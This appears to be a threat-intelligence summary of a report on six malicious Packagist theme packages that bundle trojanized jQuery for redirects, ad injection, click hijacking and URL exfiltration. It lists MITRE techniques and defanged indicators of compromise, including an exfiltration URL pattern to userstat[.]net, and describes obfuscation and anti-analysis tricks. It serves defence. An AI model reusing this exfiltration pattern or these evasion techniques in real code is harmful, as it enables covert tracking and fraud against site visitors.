Socket’s Threat Research Team identified six malicious Composer packages under the ophimcms namespace on Packagist that bundle trojanized JavaScript (disguised as jQuery) to exfiltrate URLs, inject ads, hijack clicks, and redirect mobile users to gambling and adult sites. The campaign uses userstat[.]net and FUNNULL-operated infrastructure (notably union[.]macoms[.]la) as C2/redirect hosts and remains live despite OFAC sanctions; #FUNNULL #OphimCMS
Keypoints
- Socket found six malicious Packagist Composer packages published under the ophimcms namespace that ship trojanized JavaScript assets masquerading as legitimate jQuery libraries.
- Two distinct payload lines exist: FUNNULL-linked mobile redirect chains (union[.]macoms[.]la) and a geographic-agnostic URL-exfiltration chain (userstat[.]net); both are embedded in bundled JS, not PHP.
- Three packages attributed to dev@ophim[.]cc carry FUNNULL-linked payloads; packages tied to opdlnf01@gmail[.]com deliver ad injection, click hijacking, and anti-debugging payloads, across 26 total packages in the organization.
- The FUNNULL second-stage uses multi-layer obfuscation, environment checks (mobile-only, timezone gating, probabilistic sampling, anti-headless/admin checks) and redirects users to gambling/adult sites, while userstat[.]net exfiltrates page URLs via a script GET parameter.
- Other malicious behaviors include full-screen overlay ads, unauthorized analytics (Baidu, 51.la), click hijacking, and anti-debugging techniques that impede analysis and block admin detection.
- Socket submitted takedown requests; recommended actions include removing affected themes, auditing outbound requests and bundled JS for appended/injected code, and monitoring for specific domains and localStorage keys.
MITRE Techniques
- [T1195.002 ] Compromise Software Supply Chain – Malicious Composer packages on Packagist impersonated OphimCMS themes to deliver trojanized JS (‘six malicious Composer packages published under the ophimcms namespace on Packagist (PHP)’)
- [T1027 ] Obfuscated Files or Information – Second-stage payloads use layered obfuscation to evade detection (‘3-layer obfuscation (rotating string array, Base64 + RC4 encryption, and wrapper functions with offset indirection)’)
- [T1059.007 ] JavaScript Execution – Malicious code executes in browsers via trojanized jQuery files to redirect, exfiltrate, and inject ads (‘trojanized JavaScript assets… that redirect visitors, exfiltrate URLs, inject ads’)’
- [T1204.001 ] User Execution: Malicious Link – Click hijacking and forced redirects rely on user interactions to trigger malicious navigation (‘When a user clicks any matching link, the intended destination opens in a new tab via window.open() while the current window is simultaneously redirected’)’
- [T1041 ] Exfiltration Over C2 Channel – URL exfiltration is performed by loading a remote script with the current page URL as a parameter (‘https://userstat[.]net/get/script.js?referrer=’)’
- [T1583.008 ] Acquire Infrastructure: Malvertising – Ad networks and FUNNULL CDN infrastructure are used to host and route malicious payloads and redirects (‘union[.]macoms[.]la is a documented FUNNULL IOC’)
Indicators of Compromise
- [Malicious Packages ] Packagist themes used to distribute payloads – ophimcms/theme-dy, ophimcms/theme-rrdyw, and 4 more malicious theme packages
- [Domains ] C2 and redirect infrastructure – union[.]macoms[.]la (FUNNULL second-stage redirect), userstat[.]net (URL exfiltration), and cre-ads[.]com (click-hijack ad network)
- [IP:Port ] Ad injection C2 – 23[.]225[.]52[.]67:4466 (hardcoded ad injection endpoint hosted by CNSERVERS LLC)
- [Threat Actor Emails ] Publisher attribution – dev@ophim[.]cc (FUNNULL-linked payloads), opdlnf01@gmail[.]com (ad injection/click hijack/anti-debug payloads)
- [GitHub ] Source repositories and accounts – https://github[.]com/ophimcms (organization hosting repositories), https://github[.]com/phantom0803 and https://github[.]com/binhnguyen1998822 (accounts linked via commit history)
- [File Hash ] Known malicious JS artifact – SHA256 FDFCBF04343F4EB89BAB9EAF40FEE178D9002A42C7949C9BBD24C0E8831A04B0 (union[.]macoms[.]la/jquery.min-3.6.8.js)
- [Tracking IDs ] Unauthorized analytics identifiers – Baidu Analytics 71d6a48495935b1d8996cc128d9a6819 (theme-dy), Baidu Analytics 998752431dfb16634c12a163110e90ea (theme-rrdyw)
Read more: https://socket.dev/blog/6-malicious-packagist-themes-ship-trojanized-jquery